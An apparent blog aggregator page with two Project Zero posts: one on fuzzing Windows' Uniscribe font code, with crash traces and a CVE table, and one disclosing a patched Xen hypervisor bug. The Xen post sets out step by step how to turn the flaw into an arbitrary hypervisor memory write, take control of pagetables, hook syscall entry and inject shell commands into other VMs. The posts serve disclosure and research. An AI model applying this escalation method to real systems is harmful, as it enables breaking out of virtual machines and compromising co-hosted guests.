Among the total of 119 vulnerabilities with CVEs fixed by Microsoft in the March Patch Tuesday a few weeks ago, there were 29 bugs reported by us in the font-handling code of the Uniscribe library. Admittedly the subject of font-related security has already been extensively discussed on this blog both in the context of manual analysis [1][2] and fuzzing [3][4]. However, what makes this effort a bit different from the previous ones is the fact that Uniscribe is a little-known user-mode component, which had not been widely recognized as a viable attack vector before, as opposed to the kernel-mode font implementations included in the win32k.sys and ATMFD.DLL drivers. In this post, we outline a brief history and description of Uniscribe, explain how we approached at-scale fuzzing of the library, and highlight some of the more interesting discoveries we have made so far. All the raw reports of the bugs we’re referring to (as they were submitted to Microsoft), together with the corresponding proof-of-concept samples, can be found in the official Project Zero bug tracker [5]. Enjoy!IntroductionIt was November 2016 when we started yet another iteration of our Windows font fuzzing job (whose architecture was thoroughly described in [4]). At that point, the kernel attack surface was mostly fuzz-clean with regards to the techniques we were using, but we still like to play with the configuration and input corpus from time to time to see if we can squeeze out any more bugs with the existing infrastructure. What we ended up with a several days later were a bunch of samples which supposedly crashed the guest Windows system running inside of Bochs. When we fed them to our reproduction pipeline, none of the bugchecks occurred again for unclear reasons. As disappointing as that was, there also was one interesting and unexpected result: for one of the test cases, the user-mode harness crashed itself, without bringing the whole OS down at the same time. This could indicate either that there was a bug in our code, or that there was some unanticipated font parsing going on in ring-3. When we started digging deeper, we found out that the unhandled exception took place in the following context:
(4464.11b4): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246USP10!ScriptPositionSingleGlyph+0x28533:752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????
Until that moment, we didn’t fully realize that our tools were triggering any font-handling code beyond the well-known kernel implementation (despite some related bugs having been publicly fixed in the past, e.g. CVE-2016-7274 [6]). As a result, the fuzzing system was not prepared to catch user-mode faults, and thus any such crashes had remained completely undetected in favor of system bugchecks, which caused full machine restarts.
We quickly determined that the usp10.dll library corresponded to “Uniscribe Unicode script processor” (in Microsoft’s own words) [7]. It is a relatively large module (600-800 kB depending on system version and bitness) responsible for rendering Unicode-encoded text, as the name suggests. From a security perspective, it’s important that the code base dates back to Windows 2000, and includes a C++ implementation of the parsing of various complex TrueType/OpenType structures, in addition to what is already implemented in the kernel. The specific tables that Uniscribe touches on are primarily Advanced Typography Tables (“GDEF”, “GSUB”, “GPOS”, “BASE”, “JSTF”), but also “OS/2”, “cmap” and “maxp” to some extent. What’s equally significant is that the code can be reached simply by calling the DrawText [8] or other equivalent API with Unicode-encoded text and an attacker-controlled font. Since no special calls other than the typical ones are necessary to execute the most exposed areas of the library, it makes for a great attack vector in applications which use GDI to render text with fonts originating from untrusted sources. This is also evidenced by the stack trace of the original crash, and the fact that it occurred in a program which didn’t include any usp10-specific code:
0:000> kbChildEBP RetAddr0026ec2c 09340ffc USP10!otlChainRuleSetTable::rule+0x130026eccc 0133d7d2 USP10!otlChainingLookup::apply+0x7d30026ed48 0026f09c USP10!ApplyLookup+0x2610026ef4c 0026f078 USP10!ApplyFeatures+0x4810026ef98 09342f40 USP10!SubstituteOtlGlyphs+0x1bf0026efd4 0026f0b4 USP10!SubstituteOtlChars+0x2200026f250 0026f370 USP10!HebrewEngineGetGlyphs+0x6900026f310 0026f370 USP10!ShapingGetGlyphs+0x36a0026f3fc 09316318 USP10!ShlShape+0x2ef0026f440 09316318 USP10!ScriptShape+0x15f0026f4a0 0026f520 USP10!RenderItemNoFallback+0xfa0026f4cc 0026f520 USP10!RenderItemWithFallback+0x1040026f4f0 09316124 USP10!RenderItem+0x220026f534 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e90026f54c 0000000a USP10!ScriptStringAnalyse+0x2840026f598 0000000a LPK!LpkStringAnalyse+0xe50026f694 00000000 LPK!LpkCharsetDraw+0x3320026f6c8 00000000 LPK!LpkDrawTextEx+0x400026f708 00000000 USER32!DT_DrawStr+0x13c0026f754 0026fa30 USER32!DT_GetLineBreak+0x780026f800 0000000a USER32!DrawTextExWorker+0x2550026f824 ffffffff USER32!DrawTextExW+0x1e
As can be seen here, the Uniscribe functionality was invoked internally by user32.dll through the lpk.dll (Language Pack) library. As soon as we learned about this new attack vector, we jumped at the first chance to fuzz it. Most of the infrastructure was already in place, since both user- and kernel-mode font fuzzing share a large number of the pieces. The extra work that we had to do was mostly related to filtering the input corpus, fiddling with the mutator configuration, adjusting the system configuration and implementing logic for the detection of user-mode crashes (both in the test harness and Bochs instrumentation). All of these steps are discussed in detail below. After a few days, we had everything working as planned, and after another couple, there were already over 80 crashes at unique addresses waiting for triage. Below is a summary of the issues that were found in the first fuzzing run and reported to Microsoft in December 2016.Results at a glanceSince ~80 was still a fairly manageable number of crashes to triage manually, we tried to reproduce each of them by hand, deduplicating them and writing down their details at the same time. When we finished, we ended up with 8 separate high-severity issues that could potentially allow remote code execution:
Tracker IDMemory access type at crashCrashing functionCVE1022Invalid write of n bytes (memcpy)usp10!otlList::insertAtCVE-2017-01081023Invalid read / write of 2 bytesusp10!AssignGlyphTypesCVE-2017-00841025Invalid write of n bytes (memset)usp10!otlCacheManager::GlyphsSubstitutedCVE-2017-00861026Invalid write of n bytes (memcpy)usp10!MergeLigRecordsCVE-2017-00871027Invalid write of 2 bytesusp10!ttoGetTableDataCVE-2017-00881028Invalid write of 2 bytesusp10!UpdateGlyphFlagsCVE-2017-00891029Invalid write of n bytesusp10!BuildFSM and nearby functionsCVE-2017-00901030Invalid write of n bytesusp10!FillAlternatesListCVE-2017-0072
All of the bugs but one were triggered through a standard DrawText call and resulted in heap memory corruption. The one exception was the #1030 issue, which resided in a documented Uniscribe-specific ScriptGetFontAlternateGlyphs API function. The routine is responsible for retrieving a list of alternate glyphs for a specified character, and the interesting fact about the bug is that it wasn’t a problem with operating on any internal structures. Instead, the function failed to honor the value of the cMaxAlternates argument, and could therefore write more output data to the pAlternateGlyphs buffer than was allowed by the function caller. This meant that the buffer overflow was not specific to any particular memory type – depending on what pointer the client passed in, the overflow would take place on the stack, heap or static memory. The exploitability of such a bug would greatly depend on the program design and compilation options used to build it. We must admit, however, that it is unclear what the real-world clients of the function are, and whether any of them would meet the requirements to become a viable attack target.
Furthermore, we extracted 27 unique crashes caused by invalid memory reads from non-NULL addresses, which could potentially lead to information disclosure of secrets stored in the process address space. Due to the large volume of these crashes, we were unable to analyze each of them in much detail or perform any advanced deduplication. Instead, we partitioned them by the top-level exception address, and filed all of them as a single entry #1031 in the bug tracker:
  1. usp10!otlMultiSubstLookup::apply+0xa8
  2. usp10!otlSingleSubstLookup::applyToSingleGlyph+0x98
  3. usp10!otlSingleSubstLookup::apply+0xa9
  4. usp10!otlMultiSubstLookup::getCoverageTable+0x2c
  5. usp10!otlMark2Array::mark2Anchor+0x18
  6. usp10!GetSubstGlyph+0x2e
  7. usp10!BuildTableCache+0x1ca
  8. usp10!otlMkMkPosLookup::apply+0x1b4
  9. usp10!otlLookupTable::markFilteringSet+0x1a
  10. usp10!otlSinglePosLookup::getCoverageTable+0x12
  11. usp10!BuildTableCache+0x1e7
  12. usp10!otlChainingLookup::getCoverageTable+0x15
  13. usp10!otlReverseChainingLookup::getCoverageTable+0x15
  14. usp10!otlLigCaretListTable::coverage+0x7
  15. usp10!otlMultiSubstLookup::apply+0x99
  16. usp10!otlTableCacheData::FindLookupList+0x9
  17. usp10!ttoGetTableData+0x4b4
  18. usp10!GetSubtableCoverage+0x1ab
  19. usp10!otlChainingLookup::apply+0x2d
  20. usp10!MergeLigRecords+0x132
  21. usp10!otlLookupTable::subTable+0x23
  22. usp10!GetMaxParameter+0x53
  23. usp10!ApplyLookup+0xc3
  24. usp10!ApplyLookupToSingleGlyph+0x6f
  25. usp10!ttoGetTableData+0x19f6
  26. usp10!otlExtensionLookup::extensionSubTable+0x1d
  27. usp10!ttoGetTableData+0x1a77

In the end, it turned out that these 27 crashes manifested 21 actual bugs, which were fixed by Microsoft as CVE-2017-0083, CVE-2017-0091, CVE-2017-0092 and CVE-2017-0111 to CVE-2017-0128 in the MS17-011 security bulletin.
Lastly, we also reported 7 unique NULL pointer dereference issues with no deadline, with the hope that having any of them fixed would potentially enable our fuzzer to discover other, more severe bugs. On March 17th, MSRC responded that they investigated the cases and concluded that they were low-severity DoS problems only, and would not be fixed as part of a security bulletin in the near future. Input corpus, mutation configuration and adjusting the test harnessGathering a solid corpus of input samples is arguably one of the most important parts of fuzzing preparation, especially if code coverage feedback is not involved, making it impossible for the corpus to gradually evolve into a more optimal form. We were lucky enough to already have had several font corpora at our disposal from previous fuzzing runs. We decided to use the same set of files that had helped us discover 18 Windows kernel bugs in the past (see the “Preparing the input corpus” section of [4]). It was originally generated by running a corpus distillation algorithm over a large number of fonts crawled off the web, using an instrumented build of the FreeType2 open-source library, and consisted of 14848 TrueType and 4659 OpenType files, for a total of 2.4G of disk space. In order to tailor the corpus better for Uniscribe, we reduced it to just the files that contained at least one of the “GDEF”, “GSUB”, “GPOS”, “BASE” or “JSTF” tables, which are parsed by the library. This left us with 3768 TrueType and 2520 OpenType fonts consuming 1.68G on disk, which were much more likely to expose bugs in Uniscribe than any of the removed ones. That was the final corpus that we worked with.
The mutator configuration was also pretty similar to what we did for the kernel: we used the same five standard bitflipping, byteflipping, chunkspew, special ints and binary arithmetic algorithms with the precalculated per-table mutation ratio ranges. The only change made specifically for Uniscribe was to add mutations for the “BASE” and “JSTF” tables, which were previously not accounted for.
Last but not least, we extended the functionality of the guest fuzzing harness, responsible for invoking the tested font-related API (mostly displaying all of the font’s glyphs at various point sizes, but also querying a number of properties etc.). While it was clear that some of the relevant code was executed automatically through user32!DrawText with no modifications required, we wanted to maximize the coverage of Uniscribe code as much possible. A full reference of all its externally available functions can be found on MSDN [9]. After skimming through the documentation, we added calls to ScriptCacheGetHeight, ScriptGetFontProperties, ScriptGetCMap, ScriptGetFontAlternateGlyphs, ScriptSubstituteSingleGlyph and ScriptFreeCache. This quickly proved to be a successful idea, as it allowed us to discover the aforementioned generic bug in ScriptGetFontAlternateGlyphs. Furthermore, we decided to remove invocations of the GetKerningPairs and GetGlyphOutline API functions, as their corresponding logic was located in the kernel, while our focus had now shifted strictly to user-mode. As such, they wouldn’t lead to the discovery of any new bugs in Uniscribe, but would instead slow the overall fuzzing process down. Apart from these minor modifications, the core of the test harness remained unchanged.
By taking the measures listed above, we hoped that they were sufficient to trigger most of the low hanging fruit bugs. With this assumption, the only part left was to make sure that the crashes would be reliably caught and reported to the fuzzer. This subject is discussed in the next section.Crash detectionThe first step we took to detect Uniscribe crashes effectively was disabling Special Pools for win32k.sys and ATMFD.DLL (which caused unnecessary overhead for no gain in user-mode), while enabling the PageHeap option in Application Verifier for the harness process. This was done to improve our chances at detecting invalid memory accesses, and make reproduction and deduplication more reliable.
Thanks to the fact that the fuzz-tested code in usp10.dll executed in the same context as the rest of the harness logic, we didn’t have to write a full-fledged Windows debugger to supervise another process. Instead, we just set up a top-level exception handler with the SetUnhandledExceptionFilter function, which then got called every time a fatal exception was generated in the process. The handler’s job was to send out the state of the crashing CPU context (passed in through ExceptionInfo->ContextRecord) to the hypervisor (i.e. the Bochs instrumentation) through the “debug print” hypercall, and then actually report that the crash occurred at the specific address.
In the kernel font fuzzing scenario, crashes were detected by the Bochs instrumentation with the BX_INSTR_RESET instrumentation callback. This approach worked because the guest system was configured to automatically reboot on bugcheck, consequently triggering the bx_instr_reset handler. The easiest way to integrate this approach with user-mode fuzzing would be therefore to just add a ExitWindowsEx call in the epilogue of the exception handler, making everything work out of the box without even touching the existing Bochs instrumentation. However, the method would result in losing information about the crash location, making automated deduplication impossible. In order to address this problem, we introduced a new “crash encountered” hypercall, which received the address of the faulting instruction in the argument from the guest, and passed this information further down our scalable fuzzing infrastructure. Having the crashes grouped by the exception address right from the start saved us a ton of postprocessing time, and limited the number of test cases we had to look at to a bare minimum.
This is the end of a list of differences between the Windows kernel font fuzzing setup we’ve been using for nearly two years now, and an equivalent setup for user-mode fuzzing that we only built a few months ago, but has already proven very effective. Everything else has remained the same as described in the “font fuzzing techniques” article from last year [4].ConclusionsIt is a fascinating but dire realization that even for such a well known class of bug hunting targets as font parsing implementations, it is still possible to discover new attack vectors dating back to the previous century, having remained largely unaudited until now, and being as exposed as the interfaces we already know about. We believe that this is a great example of how gradually rising the bar for a variety of software can have much more impact than trying to kill every last bug in a narrow range of code. It is also illustrative of the fact that the time spent on thoroughly analyzing the attack surface and looking for little-known targets may turn out very fruitful, as the security community still doesn’t have a full understanding of the attack vectors in every important data processing stack (such as the Windows font handling in this case).
This effort and its results show that fuzzing is a very universal technique, and most of its components can be easily reused from one target to another, especially within the scope of a single file format. Finally, it has proven that it is possible to fuzz not just the Windows kernel, but also regular user-mode code, regardless of the environment of the host system (which was Linux in our case). While the Bochs x86 emulator incurs a significant overhead as compared to native execution speed, it can often be scaled against to still achieve a net gain in the number of iterations per second. As an interesting fact, issues #993 (Windows kernel registry hive loading), #1042 (EMF+ processing in GDI+), #1052 and #1054 (color profile processing) fixed in the last Patch Tuesday were also found with fuzzing Windows on Bochs, but with slightly different input samples, test harnesses and mutation strategies. :)References
  1. The “One font vulnerability to rule them all” series starting with
Categories: Security

Pandavirtualization: Exploiting the Xen hypervisor

Google Project Zero - Fri, 04/07/2017 - 09:20
Posted by Jann Horn, Project Zero
On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue 2017-04-04.
To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.Backgroundaccess_ok()On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:

Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.
Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:
  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:
/* * Valid if in +ve half of 48-bit address space, or above Xen-reserved area. * This is also valid for range checks (addr, addr+size). As long as the * start address is outside the Xen-reserved area then we will access a * non-canonical address (and thus fault) before ever reaching VIRT_START. */#define __addr_ok(addr) \    (((unsigned long)(addr) < (1UL<<47)) || \     ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))
#define access_ok(addr, size) \    (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!
Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
When I saw the definition of access_ok(), the lack of security guarantees actually provided by access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.Hypercall PreemptionWhen e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.
In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to schedule to another vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.
This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.
This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.memory_exchange()The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA because DMA requires physically contiguous buffers.
The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:
struct xen_memory_reservation {    /* [...] */    XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */
   /* Number of extents, and size/alignment of each (2^extent_order pages). */    xen_ulong_t    nr_extents;    unsigned int   extent_order;
   /* XENMEMF flags. */    unsigned int   mem_flags;
   /*     * Domain whose reservation is being changed.     * Unprivileged domains can specify only DOMID_SELF.     */    domid_t        domid;};
struct xen_memory_exchange {    /*     * [IN] Details of memory extents to be exchanged (GMFN bases).     * Note that @in.address_bits is ignored and unused.     */    struct xen_memory_reservation in;
   /*     * [IN/OUT] Details of new memory extents.     * We require that:     *  1. @in.domid == @out.domid     *  2. @in.nr_extents  << @in.extent_order ==     *     @out.nr_extents << @out.extent_order     *  3. @in.extent_start and @out.extent_start lists must not overlap     *  4. @out.extent_start lists GPFN bases to be populated     *  5. @out.extent_start is overwritten with allocated GMFN bases     */    struct xen_memory_reservation out;
   /*     * [OUT] Number of input extents that were successfully exchanged:     *  1. The first @nr_exchanged input extents were successfully     *     deallocated.     *  2. The corresponding first entries in the output extent list correctly     *     indicate the GMFNs that were successfully exchanged.     *  3. All other input and output extents are untouched.     *  4. If not all input exents are exchanged then the return code of this     *     command will be non-zero.     *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!     */    xen_ulong_t nr_exchanged;};
The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.
nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.
Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (
diff --git a/xen/common/memory.c b/xen/common/memory.cindex 4e7c234..59379d3 100644--- a/xen/common/memory.c+++ b/xen/common/memory.c@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)         goto fail_early;     } +    if ( !guest_handle_okay(, ||+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )+    {+        rc = -EFAULT;+        goto fail_early;+    }+     /* Only privileged guests can allocate multi-page contiguous extents. */     if ( !multipage_allocation_permitted(current->domain,                                 ||The bugAs can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:
static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg){    [...]
   /* Various sanity checks. */    [...]
   if ( !guest_handle_okay(, ||         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )    {        rc = -EFAULT;        goto fail_early;    }
   for ( i = (exch.nr_exchanged >> in_chunk_order);          i < ( >> in_chunk_order);          i++ )    {        [...]        /* Assign each output page to the domain. */        for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )        {            [...]            if ( !paging_mode_translate(d) )            {                [...]                if ( __copy_to_guest_offset(exch.out.extent_start,                                            (i << out_chunk_order) + j,                                            &mfn, 1) )                    rc = -EFAULT;            }        }        [...]    }    [...]}
However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:
  • and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • and exch.out.nr_extents as exch.nr_exchanged+1
  • as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided by the page size).Exploiting the bug: Gaining pagetable controlEspecially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.
It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:
  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.
Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.
Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
At this point, the attacker can control a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.Running shell commands in other VMsAt this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; and a realistic attacker probably wouldn't want to inject code into VMs, considering how much more detectable that makes an attack.
But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.
As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.
My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.
(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)
Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:

ConclusionI believe that the root cause of this issue were the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer code because it was committed with less scrutiny regarding security issues, and such old code is then often left alone.
When security-relevant code is optimized based on assumptions, care must be taken to reliably prevent those assumptions from being violated. access_ok() actually used to check whether the whole range overlaps hypervisor memory, which would have prevented this bug from occurring. Unfortunately, in 2005, a commit with "x86_64 fixes/cleanups" was made that changed the behavior of access_ok() on x86_64 to the current one. As far as I can tell, the only reason this didn't immediately make the MEMOP_increase_reservation and MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents argument of do_dom_mem_op() was only 32 bits wide - a relatively brittle defense.
While there have been several Xen vulnerabilities that only affected PV guests because the issues were in code that is unnecessary when dealing with HVM guests, I believe that this isn't one of them. Accessing guest virtual memory is much more straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds check followed by a memcpy with pagefault fixup - the same thing normal operating system kernels do when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to do a page-wise copy (because the memory area might be physically non-contiguous and the hypervisor doesn't have a contiguous virtual mapping of it) with guest pagetable walks (to translate guest virtual addresses to guest physical addresses) and guest frame lookups for every page, including reference counting, mapping guest pages into hypervisor memory and various checks to e.g. prevent HVM guests from writing to readonly grant mappings. So for HVM, the complexity of handling guest memory accesses is actually higher than for PV.
For security researchers, I think that a lesson from this is that paravirtualization is not much harder to understand than normal kernels. If you've audited kernel code before, the hypercall entry path (lstar_enter and int80_direct_trap in xen/arch/x86/x86_64/entry.S) and the basic design of hypercall handlers (for x86 PV: listed in the pv_hypercall_table in xen/arch/x86/pv/hypercall.c) should look more or less like normal syscalls.

Categories: Security
Subscribe to aggregator - Security